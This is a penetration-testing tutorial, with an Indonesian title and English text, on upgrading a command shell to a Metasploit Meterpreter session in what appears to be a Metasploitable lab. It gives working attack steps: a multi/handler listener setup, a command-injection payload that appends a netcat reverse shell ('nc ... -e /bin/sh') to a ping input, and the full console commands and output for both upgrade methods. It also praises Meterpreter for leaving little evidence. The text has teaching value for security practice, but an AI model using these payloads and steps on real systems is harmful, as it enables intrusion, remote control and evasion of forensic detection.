# Menaikkan Common Shell ke Meterpreter

Popping a shell is often the main goal of a hacker, and it can be exciting when executed properly, but sometimes they do have their limitations. Metasploit's Meterpreter probably needs no introduction, but this powerful, dynamic payload can offer a leg up over normal shells. To prove it, we'll show how to take a normal command shell and elevate it to a Meterpreter session.

### Shell vs. Meterpreter <a href="#jump-shellvsmeterpreter" id="jump-shellvsmeterpreter"></a>

A shell is basically an interface that acts as a shortcut to the commands of an operating system. When it comes to hacking, there are two types of shells that are mainly talked about: bind shells and reverse shells.

A bind shell effectively binds itself to a certain port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, actively connects from the target machine to the attacking machine, where a listener is waiting for incoming connections.

Command shells provide a great way to really dig into the target, but they are not always the best option. Usually, they are constrained to the privileges of the user who initiated the shell, so the power that comes with root-level access isn't always available.

Meterpreter allows us to run post-exploitation modules and privilege escalation exploits locally on the target. It utilizes encrypted communication methods and nothing is written to disk during operation, making it a suitable weapon that leaves little to no evidence behind. Meterpreter offers a ton of other features and is highly extensible, which makes it an excellent addition to any hacker's arsenal.

### Step 1 Start a Listener <a href="#jump-step1" id="jump-step1"></a>

To get started, fire up Metasploit. Type **msfconsole** in the terminal and we'll be greeted by a nice little welcome banner after it loads. We'll be using a great feature of Metasploit, which is the ability to set up a universal listener that can handle a wide range of different types of shells. Enter the following to load the module:

```unknown
use exploit/multi/handler
```

Next, we need to specify the listening host and port, using the IP address of our local machine and an arbitrary port number. We also need to set the payload — the versatile reverse TCP shell is an excellent choice here.

```unknown
msf5 exploit(multi/handler) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
```

Type **options** at the prompt to verify that our settings are correct.

```unknown
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.100     yes       The listen address (an interface may be specified)
   LPORT  1234             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
```

It looks like we're good to go. Type **run** to launch the handler, and it's now ready and waiting for an incoming connection.

```unknown
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.1.100:1234
```

### Step 2 Get Shell with Netcat <a href="#jump-step2" id="jump-step2"></a>

Netcat is a powerful networking utility commonly used to troubleshoot connectivity issues, but it can also be utilized as a backdoor via command shells. We can use this tool, coupled with a command injection vulnerability, to spawn a shell and connect back to our local machine. If all goes well, the handler that we set up earlier will catch the shell and we'll be able to issue commands.

This vulnerability lets us append system commands to the input for the ping utility.

```unknown
127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh
```

Here, we've tacked on the Netcat command to spawn a shell and connect to our local machine on port 1234:

<figure><img src="https://2370299969-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MTchLGQ78eoG4OiLFnV%2Fuploads%2FadZMy6UN4lLawQ5h57Lc%2Fimage.png?alt=media&#x26;token=d7506c74-095d-4645-b739-4aeb508844a8" alt=""><figcaption></figcaption></figure>

After a moment, back in the terminal with our handler, we see that a session is opened up. We can now issue commands like **id** and **uname -a** to verify this.

```unknown
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 1 opened (172.16.1.100:1234 -> 172.16.1.102:53462) at 2019-01-29 15:28:28 -0600

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
```

Finally, we need to background this session by pressing *Ctrl-Z*, followed by *Y* to confirm.

```unknown
^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) >
```

### Step 3 Elevate Shell to Meterpreter Session <a href="#jump-step3" id="jump-step3"></a>

Now that we have attained a session on the target, we can upgrade that humble shell to a full-fledged Meterpreter session. This will allow for greater flexibility when it comes to interacting with the target.

In order to view any sessions that are currently open, type **sessions** at the prompt. Below, we can see the session we opened earlier, along with its ID, shell type, and connection information.

```unknown
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
```

The easiest way to transform a regular session into a Meterpreter session is to use the **-u** flag. Issue the sessions command with the appropriate ID and watch the magic happen.

```unknown
msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.100:4433
[*] Sending stage (914728 bytes) to 172.16.1.102
[*] Meterpreter session 2 opened (172.16.1.100:4433 -> 172.16.1.102:42790) at 2019-01-29 15:30:28 -0600
[*] Command stager progress: 100.00% (773/773 bytes)
```

Now it seems like nothing really happened, but in fact, we've opened a Meterpreter session in the background — it doesn't automatically drop us into it. If we issue the **sessions** command again, it will list our new Meterpreter session with an ID of 2. We can then use the **-i** flag to interact with it.

```unknown
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >
```

And now we have a Meterpreter shell. However, there is one other way to elevate a normal shell to a Meterpreter session that is similar to the method outlined above, and that is to manually use the **shell\_to\_meterpreter** post-exploitation module.

### Alternative Way to Elevate Shell to Meterpreter Session <a href="#jump-alternativewaytoelevateshelltometerpretersession" id="jump-alternativewaytoelevateshelltometerpretersession"></a>

To load it, type the following.

```unknown
use post/multi/manage/shell_to_meterpreter
```

All we have to do is specify the existing session we want to upgrade. After that, just to be sure, we can view the current settings with the **options** command.

```unknown
msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION  1                yes       The session to run this module on.
```

Type **run** to kick it off.

```unknown
msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.100:4433
[*] Sending stage (914728 bytes) to 172.16.1.102
[*] Meterpreter session 3 opened (172.16.1.100:4433 -> 172.16.1.102:59832) at 2019-01-29 15:34:16 -0600
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
```

Again, this opens up the new session in the background, so we have to issue the **sessions** command to determine the correct ID.

```unknown
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         shell x86/linux                     172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
  3         meterpreter x86/linux               172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)
```

We can see that this new Meterpreter session has an ID of 3. Now we are ready to interact with it.

```unknown
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter >
```